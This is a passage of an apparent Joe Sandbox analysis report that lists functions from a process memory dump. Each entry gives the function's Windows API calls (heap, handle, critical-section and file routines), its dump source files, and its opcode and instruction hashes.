                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1707611234-0
                                                                                                                                                                                                                                                    • Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                                                    • Instruction ID: 202c8f865ef1ebd5cd190483957952a27bd99460963ae13c6998022736112514
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A11A73160C65281EB748B12E41113EB7A0FB85B65F61127AF6ADC5AD4EF7CD054EB40
                                                                                                                                                                                                                                                    Function 00007FF69F3F9C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C6E
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C78
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                    • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                    • Instruction ID: 634baafad6fb877bd27352064b2a3d319e9ba0a07715aa5d925fe3ea1eb8cac2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7E08C10F0964243FF786BF2E84407923A1DFA8B40B1640B8C90DCB292EE3C68959390
                                                                                                                                                                                                                                                    Function 00007FF69F3F9E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF69F3F9CE5,?,?,00000000,00007FF69F3F9D9A), ref: 00007FF69F3F9ED6
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF69F3F9CE5,?,?,00000000,00007FF69F3F9D9A), ref: 00007FF69F3F9EE0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                                                                    • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                                    • Instruction ID: 429af31af993cef44f9dfc2166792ddfa572b0aff3e815c4cec4404be2b8aad7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF219211B1964241FEF49761A9803792391DF94BA0F1642BDD92ECB3D6CE6CA441A380
                                                                                                                                                                                                                                                    Function 00007FFDFFC2DCF0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFDFFC334C9,?,?,?,00007FFDFFC739B1,?,?,?,?,00007FFDFFC378EA,?,?,?), ref: 00007FFDFFC2DD38
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2077104143.00007FFDFFC21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDFFC20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077076397.00007FFDFFC20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077231574.00007FFDFFD0F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077261971.00007FFDFFD12000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ffdffc20000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                    • Opcode ID: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                                                                                                                                                                                    • Instruction ID: 56dc83b09d538f5b5e9f507a39095d72b4aae1fe62d9370d49272a7f44f745ad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC119121B4975281FB549B52B8A0A7D6390AF84F90F085734D93E8B3CDEF2CE4408760
                                                                                                                                                                                                                                                    Function 00007FFDFFC3C998 Relevance: 2.5, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFFC3C80C), ref: 00007FFDFFC3C9C4
                                                                                                                                                                                                                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFFC3C80C), ref: 00007FFDFFC3CA19
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2077104143.00007FFDFFC21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDFFC20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077076397.00007FFDFFC20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077231574.00007FFDFFD0F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077261971.00007FFDFFD12000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ffdffc20000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                    • Opcode ID: 0291edbe3082b304451f4ed1c39b7bd1e6a79d51fcd4033be8e3744c9ea70ef5
                                                                                                                                                                                                                                                    • Instruction ID: dbabd3abd1aeea60723149352dc65f1933501306beeed26fcf52a1be6ecfdbd5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0291edbe3082b304451f4ed1c39b7bd1e6a79d51fcd4033be8e3744c9ea70ef5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA112E31B0866292F350DB14B8A497E63A4EB44780F550635EA7D937E9DE7CE8518740
                                                                                                                                                                                                                                                    Function 00007FFDFFC3C7F0 Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFDFFC3C7FD
                                                                                                                                                                                                                                                      • Part of subcall function 00007FFDFFC3C998: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFFC3C80C), ref: 00007FFDFFC3C9C4
                                                                                                                                                                                                                                                      • Part of subcall function 00007FFDFFC3C998: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FFDFFC3C80C), ref: 00007FFDFFC3CA19
                                                                                                                                                                                                                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFDFFC3C823
                                                                                                                                                                                                                                                      • Part of subcall function 00007FFDFFC3C93C: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFDFFC3C95C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FFDFFC3C838: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FFDFFC3C89A
                                                                                                                                                                                                                                                      • Part of subcall function 00007FFDFFC3C838: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFFC3C8B0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2077104143.00007FFDFFC21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDFFC20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077076397.00007FFDFFC20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077231574.00007FFDFFD0F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077261971.00007FFDFFD12000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ffdffc20000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$FileHandleInfoStartupType
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2762830733-0
                                                                                                                                                                                                                                                    • Opcode ID: ec87571a4dd4f9888bb3e403b7d3050c44f51055bcf036c43b695e8927277bbf
                                                                                                                                                                                                                                                    • Instruction ID: 962895f22de7397232247c35d161a26b3a49d94e04fca919526ac17edaecae26
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec87571a4dd4f9888bb3e403b7d3050c44f51055bcf036c43b695e8927277bbf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6E04614F0C61281FB50AB61A8F68BD23909F28341F801234C93E822D9DE1CA1CAC711
                                                                                                                                                                                                                                                    Function 00007FF69F3FB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                                                    • Instruction ID: bbfd5a992f77d4e031c4322b500f828428973ea82f71b0ec4adb89331316ac7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B741E17290820287FAB49B19E54127D7BA0EB56B84F160179DA8ECB6D1CF3CE502D790
                                                                                                                                                                                                                                                    Function 00007FF69F3E76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _fread_nolock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 840049012-0
                                                                                                                                                                                                                                                    • Opcode ID: 9f706e5128712b6869c2d2c07352d7225d43e0c8eb2ba46115c5844ceaa0f297
                                                                                                                                                                                                                                                    • Instruction ID: d90be4ec4856d889ecc234803bccee6edfb2f98d100d34012eacf75df4b36528
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f706e5128712b6869c2d2c07352d7225d43e0c8eb2ba46115c5844ceaa0f297
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C921B611B1825147FA309A16A5083FA9741FF45BD4F8944B8ED2C8F786CE7DE851C340
                                                                                                                                                                                                                                                    Function 00007FF69F3FAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                                                    • Instruction ID: 0ecc8cc3e44a42ffdbb66cfe8a6f0cbcbadbabc0d264f15ff1695200d618d1b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A731A521A2864146FBA15B55D44137D3750EB50BB1F5301BAE92DCB3D2CF7CE451A790
                                                                                                                                                                                                                                                    Function 00007FF69F3F8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3947729631-0
                                                                                                                                                                                                                                                    • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                                    • Instruction ID: 51acdb7cecce287c28ef20ec8f6b01616ca42bef74e42f54a95387b580aa3a05
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE218E32A157068AFBA89F64C4402EC33A0FB44718F55467AD62C8AAD5EF3CD554DB90
                                                                                                                                                                                                                                                    Function 00007FF69F3F52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                                                    • Instruction ID: eec43291f8774ef66e9a97d3cf983ed629efa433201423e345f569514fa6e4e9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA118421A1D64182FAF09F51D80017EA3A4EF95B80F564179EA4CDFA96CF3CE440A780
                                                                                                                                                                                                                                                    Function 00007FF69F405664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                                    • Instruction ID: 37da204fbde32c25712b890bf3a1b8a30897474bd7b55234f80cb316e4168b4b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E21A73261868187EB718F18E44077977A0EB94F94F294234EA5DC76EADF7DD400CB00
                                                                                                                                                                                                                                                    Function 00007FFDFFC376F0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2077104143.00007FFDFFC21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDFFC20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077076397.00007FFDFFC20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077231574.00007FFDFFD0F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077261971.00007FFDFFD12000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ffdffc20000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __vcrt_initialize_locks__vcrt_initialize_winapi_thunks
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2444027679-0
                                                                                                                                                                                                                                                    • Opcode ID: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                                                                                                    • Instruction ID: 964a1db9c04b3953eaad82d32637c00020963fbab247501e51fde359cb367d2d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF112B22F0C72241FFA14B25B4A0BBD6390AF04BA0F584735D9BD567DDDE6EE885C610
                                                                                                                                                                                                                                                    Function 00007FF69F3EF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
